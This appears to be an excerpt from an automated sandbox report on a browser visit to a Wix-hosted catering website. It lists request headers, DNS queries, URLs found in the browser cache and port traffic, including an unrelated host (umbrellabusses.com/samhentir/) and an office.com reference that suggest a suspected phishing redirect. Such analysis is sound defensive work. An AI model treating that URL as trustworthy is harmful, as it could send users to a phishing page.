Source: global trafficHTTP traffic detected: GET /services/editor-elements-library/dist/thunderbolt/rb_wixui.thunderbolt[StripColumnsContainer_Default].51ef30fd.bundle.min.js HTTP/1.1Host: static.parastorage.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.samantacatering.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /services/editor-elements-library/dist/thunderbolt/rb_wixui.thunderbolt[FiveGridLine_SolidLine].b91bad1d.bundle.min.js HTTP/1.1Host: static.parastorage.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.samantacatering.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /services/editor-elements-library/dist/thunderbolt/rb_wixui.thunderbolt[FiveGridLine_SolidLine].b91bad1d.bundle.min.js HTTP/1.1Host: static.parastorage.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /services/editor-elements-library/dist/thunderbolt/rb_wixui.thunderbolt[SkipToContentButton].69abe737.bundle.min.js HTTP/1.1Host: static.parastorage.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /services/editor-elements-library/dist/thunderbolt/rb_wixui.thunderbolt[Column_DefaultColumn].7f905244.bundle.min.js HTTP/1.1Host: static.parastorage.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.samantacatering.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /services/editor-elements-library/dist/thunderbolt/rb_wixui.thunderbolt[StripColumnsContainer_Default].51ef30fd.bundle.min.js HTTP/1.1Host: static.parastorage.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /services/editor-elements-library/dist/thunderbolt/rb_wixui.thunderbolt[Column_DefaultColumn].7f905244.bundle.min.js HTTP/1.1Host: static.parastorage.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /services/editor-elements-library/dist/thunderbolt/rb_wixui.thunderbolt[ClassicSection].17ff44ab.bundle.min.js HTTP/1.1Host: static.parastorage.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.samantacatering.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /services/editor-elements-library/dist/thunderbolt/rb_wixui.thunderbolt[StylableButton_Default].e479a096.bundle.min.js HTTP/1.1Host: static.parastorage.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.samantacatering.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /services/editor-elements-library/dist/thunderbolt/rb_wixui.thunderbolt[ClassicSection].17ff44ab.bundle.min.js HTTP/1.1Host: static.parastorage.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /services/editor-elements-library/dist/thunderbolt/rb_wixui.thunderbolt[StylableButton_Default].e479a096.bundle.min.js HTTP/1.1Host: static.parastorage.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficDNS traffic detected: DNS query: www.google.com
Source: global trafficDNS traffic detected: DNS query: samantacatering.com
Source: global trafficDNS traffic detected: DNS query: www.samantacatering.com
Source: global trafficDNS traffic detected: DNS query: static.parastorage.com
Source: global trafficDNS traffic detected: DNS query: static.wixstatic.com
Source: global trafficDNS traffic detected: DNS query: siteassets.parastorage.com
Source: global trafficDNS traffic detected: DNS query: frog.wix.com
Source: global trafficDNS traffic detected: DNS query: panorama.wixapps.net
Source: global trafficDNS traffic detected: DNS query: umbrellabusses.com
Source: global trafficDNS traffic detected: DNS query: a.nel.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: browser.sentry-cdn.com
Source: global trafficDNS traffic detected: DNS query: sentry-next.wixpress.com
Source: unknownHTTP traffic detected: POST /api/v1/bulklog HTTP/1.1Host: panorama.wixapps.netConnection: keep-aliveContent-Length: 532sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-platform: "Windows"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Content-Type: text/plain;charset=UTF-8Accept: */*Origin: https://www.samantacatering.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyReferer: https://www.samantacatering.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Jan 2025 13:53:07 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingCache-Control: max-age=14400CF-Cache-Status: EXPIREDReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wChdzUC8WBgGMednpBYVVauLNYqHDsfVOPoWDuOCBDKJmIiE%2FcRujCcr4uHW6HmE29BnJVFnOtBjy4OBeR4ucMX1KQXsifDYXiITYn6FdrLE0T6Rvfr1ZOz6PRhZxcODC6BocTE%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ffd26c38cb5de97-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1701&min_rtt=1694&rtt_var=649&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2846&recv_bytes=1417&delivery_rate=1668571&cwnd=238&unsent_bytes=0&cid=387a7f081442a86e&ts=441&x=0"
Source: chromecache_178.2.drString found in binary or memory: http://polymer.github.io/AUTHORS.txt
Source: chromecache_178.2.drString found in binary or memory: http://polymer.github.io/CONTRIBUTORS.txt
Source: chromecache_178.2.drString found in binary or memory: http://polymer.github.io/LICENSE.txt
Source: chromecache_178.2.drString found in binary or memory: http://polymer.github.io/PATENTS.txt
Source: chromecache_252.2.dr, chromecache_167.2.drString found in binary or memory: http://underscorejs.org/LICENSE
Source: chromecache_149.2.dr, chromecache_235.2.drString found in binary or memory: https://api.whatsapp.com/send?phone=
Source: chromecache_178.2.drString found in binary or memory: https://bo.wix.com/suricate/
Source: chromecache_178.2.drString found in binary or memory: https://browser.sentry-cdn.com/6.18.2/bundle.min.js
Source: chromecache_200.2.dr, chromecache_183.2.drString found in binary or memory: https://github.com/getsentry/sentry-javascript
Source: chromecache_171.2.dr, chromecache_187.2.drString found in binary or memory: https://greensock.com
Source: chromecache_171.2.dr, chromecache_187.2.drString found in binary or memory: https://greensock.com/standard-license
Source: chromecache_252.2.dr, chromecache_167.2.drString found in binary or memory: https://lodash.com/
Source: chromecache_252.2.dr, chromecache_167.2.drString found in binary or memory: https://lodash.com/license
Source: chromecache_252.2.dr, chromecache_167.2.drString found in binary or memory: https://npms.io/search?q=ponyfill.
Source: chromecache_252.2.dr, chromecache_167.2.drString found in binary or memory: https://openjsf.org/
Source: chromecache_178.2.drString found in binary or memory: https://polyfill-fastly.io/v3/polyfill.min.js?features=fetch
Source: chromecache_239.2.dr, chromecache_194.2.drString found in binary or memory: https://reactjs.org/docs/error-decoder.html?invariant=
Source: chromecache_178.2.drString found in binary or memory: https://schema.org/
Source: chromecache_178.2.drString found in binary or memory: https://siteassets.parastorage.com/pages/pages/thunderbolt?beckyExperiments=.DatePickerPortal%2C.Log
Source: chromecache_178.2.drString found in binary or memory: https://static.parastorage.com/client/pfavico.ico
Source: chromecache_228.2.dr, chromecache_174.2.drString found in binary or memory: https://static.parastorage.com/services/editor-elements-design-systems/dist/thunderbolt/
Source: chromecache_178.2.dr, chromecache_150.2.dr, chromecache_236.2.dr, chromecache_152.2.dr, chromecache_199.2.dr, chromecache_192.2.dr, chromecache_189.2.dr, chromecache_163.2.dr, chromecache_215.2.dr, chromecache_186.2.drString found in binary or memory: https://static.parastorage.com/services/editor-elements-library/dist/thunderbolt/rb_wixui.thunderbol
Source: chromecache_178.2.drString found in binary or memory: https://static.parastorage.com/services/tag-manager-client/1.920.0/siteTags.bundle.min.js
Source: chromecache_178.2.drString found in binary or memory: https://static.parastorage.com/services/wix-thunderbolt/dist/8875.46b20782.bundle.min.js
Source: chromecache_142.2.dr, chromecache_208.2.drString found in binary or memory: https://static.parastorage.com/services/wix-thunderbolt/dist/8875.46b20782.bundle.min.js.map
Source: chromecache_251.2.dr, chromecache_255.2.drString found in binary or memory: https://static.parastorage.com/services/wix-thunderbolt/dist/9839.a6a8764d.chunk.min.js.map
Source: chromecache_153.2.dr, chromecache_232.2.drString found in binary or memory: https://static.parastorage.com/services/wix-thunderbolt/dist/animations.2164ac2a.chunk.min.js.map
Source: chromecache_246.2.dr, chromecache_175.2.drString found in binary or memory: https://static.parastorage.com/services/wix-thunderbolt/dist/assetsLoader.14dc79b8.chunk.min.js.map
Source: chromecache_178.2.drString found in binary or memory: https://static.parastorage.com/services/wix-thunderbolt/dist/bi-common.inline.7f5c46fe.bundle.min.js
Source: chromecache_178.2.drString found in binary or memory: https://static.parastorage.com/services/wix-thunderbolt/dist/bi.inline.bee051e0.bundle.min.js.map
Source: chromecache_178.2.drString found in binary or memory: https://static.parastorage.com/services/wix-thunderbolt/dist/browser-deprecation.bundle.es5.js
Source: chromecache_156.2.dr, chromecache_176.2.drString found in binary or memory: https://static.parastorage.com/services/wix-thunderbolt/dist/componentsLoader.8acadaf2.chunk.min.js.
Source: chromecache_178.2.drString found in binary or memory: https://static.parastorage.com/services/wix-thunderbolt/dist/createPlatformWorker.inline.a6c05fb0.bu
Source: chromecache_178.2.drString found in binary or memory: https://static.parastorage.com/services/wix-thunderbolt/dist/custom-element-utils.inline.d8165bd2.bu
Source: chromecache_211.2.dr, chromecache_238.2.drString found in binary or memory: https://static.parastorage.com/services/wix-thunderbolt/dist/deprecation-
Source: chromecache_178.2.drString found in binary or memory: https://static.parastorage.com/services/wix-thunderbolt/dist/externals-registry.inline.a7ae621e.bund
Source: chromecache_178.2.drString found in binary or memory: https://static.parastorage.com/services/wix-thunderbolt/dist/fastdom.inline.fbeb22f8.bundle.min.js
Source: chromecache_178.2.drString found in binary or memory: https://static.parastorage.com/services/wix-thunderbolt/dist/fastdom.inline.fbeb22f8.bundle.min.js.m
Source: chromecache_261.2.dr, chromecache_242.2.drString found in binary or memory: https://static.parastorage.com/services/wix-thunderbolt/dist/group_0.774938b3.chunk.min.js.map
Source: chromecache_191.2.dr, chromecache_253.2.drString found in binary or memory: https://static.parastorage.com/services/wix-thunderbolt/dist/group_11.ffa65b2d.chunk.min.js.map
Source: chromecache_147.2.dr, chromecache_184.2.drString found in binary or memory: https://static.parastorage.com/services/wix-thunderbolt/dist/group_2.484922c1.chunk.min.js.map
Source: chromecache_258.2.dr, chromecache_230.2.drString found in binary or memory: https://static.parastorage.com/services/wix-thunderbolt/dist/group_24.8fa71ce8.chunk.min.js.map
Source: chromecache_166.2.dr, chromecache_157.2.drString found in binary or memory: https://static.parastorage.com/services/wix-thunderbolt/dist/group_28.a74cf8a9.chunk.min.js.map
Source: chromecache_205.2.dr, chromecache_259.2.drString found in binary or memory: https://static.parastorage.com/services/wix-thunderbolt/dist/group_3.0be98eee.chunk.min.js.map
Source: chromecache_249.2.dr, chromecache_226.2.drString found in binary or memory: https://static.parastorage.com/services/wix-thunderbolt/dist/group_30.55a3b177.chunk.min.js.map
Source: chromecache_203.2.dr, chromecache_220.2.drString found in binary or memory: https://static.parastorage.com/services/wix-thunderbolt/dist/group_32.ca7bb96a.chunk.min.js.map
Source: chromecache_141.2.dr, chromecache_169.2.drString found in binary or memory: https://static.parastorage.com/services/wix-thunderbolt/dist/group_36.dabdc384.chunk.min.js.map
Source: chromecache_170.2.dr, chromecache_204.2.drString found in binary or memory: https://static.parastorage.com/services/wix-thunderbolt/dist/group_4.4a5c74ed.chunk.min.js.map
Source: chromecache_222.2.dr, chromecache_196.2.drString found in binary or memory: https://static.parastorage.com/services/wix-thunderbolt/dist/group_5.22f6e4ec.chunk.min.js.map
Source: chromecache_171.2.dr, chromecache_187.2.drString found in binary or memory: https://static.parastorage.com/services/wix-thunderbolt/dist/group_6.6ed6aac3.chunk.min.js.map
Source: chromecache_178.2.drString found in binary or memory: https://static.parastorage.com/services/wix-thunderbolt/dist/handleAccessTokens.inline.ffbf42a1.bund
Source: chromecache_178.2.drString found in binary or memory: https://static.parastorage.com/services/wix-thunderbolt/dist/initCustomElements.inline.b306420a.bund
Source: chromecache_178.2.drString found in binary or memory: https://static.parastorage.com/services/wix-thunderbolt/dist/lazyCustomElementWrapper.inline.3da43c7
Source: chromecache_178.2.drString found in binary or memory: https://static.parastorage.com/services/wix-thunderbolt/dist/main.5209da57.bundle.min.js
Source: chromecache_225.2.dr, chromecache_145.2.drString found in binary or memory: https://static.parastorage.com/services/wix-thunderbolt/dist/main.5209da57.bundle.min.js.map
Source: chromecache_178.2.drString found in binary or memory: https://static.parastorage.com/services/wix-thunderbolt/dist/main.6c453198.min.css
Source: chromecache_178.2.drString found in binary or memory: https://static.parastorage.com/services/wix-thunderbolt/dist/main.renderer.a20626f8.bundle.min.js
Source: chromecache_181.2.dr, chromecache_202.2.drString found in binary or memory: https://static.parastorage.com/services/wix-thunderbolt/dist/motion.d05a604c.chunk.min.js.map
Source: chromecache_216.2.dr, chromecache_168.2.drString found in binary or memory: https://static.parastorage.com/services/wix-thunderbolt/dist/onloadCompsBehaviors.a5af195f.chunk.min
Source: chromecache_178.2.drString found in binary or memory: https://static.parastorage.com/services/wix-thunderbolt/dist/overrideGlobals.inline.c89b4b9b.bundle.
Source: chromecache_164.2.dr, chromecache_254.2.drString found in binary or memory: https://static.parastorage.com/services/wix-thunderbolt/dist/renderer.1e49a6e4.chunk.min.js.map
Source: chromecache_218.2.dr, chromecache_155.2.drString found in binary or memory: https://static.parastorage.com/services/wix-thunderbolt/dist/reporter-api.6946832d.chunk.min.js.map
Source: chromecache_149.2.dr, chromecache_235.2.drString found in binary or memory: https://static.parastorage.com/services/wix-thunderbolt/dist/router.478f8b95.chunk.min.js.map
Source: chromecache_190.2.dr, chromecache_223.2.drString found in binary or memory: https://static.parastorage.com/services/wix-thunderbolt/dist/scrollToAnchor.03bceb39.chunk.min.js.ma
Source: chromecache_178.2.drString found in binary or memory: https://static.parastorage.com/services/wix-thunderbolt/dist/sendBeat12.inline.62e7b16d.bundle.min.j
Source: chromecache_185.2.dr, chromecache_257.2.drString found in binary or memory: https://static.parastorage.com/services/wix-thunderbolt/dist/stores.22153ee9.chunk.min.js.map
Source: chromecache_213.2.dr, chromecache_178.2.dr, chromecache_197.2.drString found in binary or memory: https://static.parastorage.com/services/wix-thunderbolt/dist/thunderbolt-commons.5848cc89.bundle.min
Source: chromecache_256.2.dr, chromecache_247.2.drString found in binary or memory: https://static.parastorage.com/services/wix-thunderbolt/dist/thunderbolt-components-registry.b89104d
Source: chromecache_146.2.dr, chromecache_250.2.drString found in binary or memory: https://static.parastorage.com/services/wix-thunderbolt/dist/triggersAndReactions.e7bf7036.chunk.min
Source: chromecache_178.2.drString found in binary or memory: https://static.parastorage.com/services/wix-thunderbolt/dist/webpack-runtime.294b62f9.bundle.min.js.
Source: chromecache_178.2.drString found in binary or memory: https://static.parastorage.com/services/wix-thunderbolt/dist/windowMessageRegister.inline.2f428192.b
Source: chromecache_207.2.dr, chromecache_229.2.drString found in binary or memory: https://static.parastorage.com/services/wix-thunderbolt/dist/windowScroll.60e92730.chunk.min.js.map
Source: chromecache_178.2.drString found in binary or memory: https://static.parastorage.com/unpkg/core-js-bundle
Source: chromecache_178.2.drString found in binary or memory: https://static.parastorage.com/unpkg/focus-within-polyfill
Source: chromecache_178.2.drString found in binary or memory: https://static.parastorage.com/unpkg/lodash
Source: chromecache_178.2.drString found in binary or memory: https://static.parastorage.com/unpkg/react
Source: chromecache_178.2.drString found in binary or memory: https://static.parastorage.com/unpkg/react-dom
Source: chromecache_178.2.drString found in binary or memory: https://umbrellabusses.com/samhentir/
Source: chromecache_248.2.drString found in binary or memory: https://www.aapanel.com/new/download.html?invite_code=aapanele
Source: chromecache_233.2.dr, chromecache_245.2.drString found in binary or memory: https://www.office.com/
Source: chromecache_178.2.drString found in binary or memory: https://www.samantacatering.com
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49865
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49986
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49864
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49985
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49863
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49984
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49981
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49980
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50054
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50175
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50053
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50174
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50176
Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49875 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50059
Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49984 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50061
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50060
Source: unknownNetwork traffic detected: HTTP traffic on port 49990 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50062
Source: unknownNetwork traffic detected: HTTP traffic on port 50068 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50102 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
Source: unknownNetwork traffic detected: HTTP traffic on port 49881 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49979
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49976
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49975
Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49973
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49972
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49971
Source: unknownNetwork traffic detected: HTTP traffic on port 50148 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49970
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50065
Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50091 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50113 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50066
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50069
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50068
Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50074 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50004 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50072
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50074
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50073
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
Source: unknownNetwork traffic detected: HTTP traffic on port 49869 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49966
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49965
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
Source: unknownNetwork traffic detected: HTTP traffic on port 49674 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49963
Source: unknownNetwork traffic detected: HTTP traffic on port 50120 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50009 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50034 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49972 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50015 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50040 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49966 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50075
Source: unknownNetwork traffic detected: HTTP traffic on port 49989 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50078
Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49892 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50079
Source: unknownNetwork traffic detected: HTTP traffic on port 50096 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50081
Source: unknownNetwork traffic detected: HTTP traffic on port 50073 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50028 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50083
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50082
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50084
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49958
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49956
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49954
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
Source: unknownNetwork traffic detected: HTTP traffic on port 50062 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49864 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50086
Source: unknownNetwork traffic detected: HTTP traffic on port 49870 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50088
Source: unknownNetwork traffic detected: HTTP traffic on port 50079 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50091
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50096
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50095
Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50018
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50139
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
Source: unknownNetwork traffic detected: HTTP traffic on port 50061 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50138
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50019
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50012
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50011
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50014
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50013
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50016
Source: unknownNetwork traffic detected: HTTP traffic on port 50078 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50015
Source: unknownNetwork traffic detected: HTTP traffic on port 49980 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
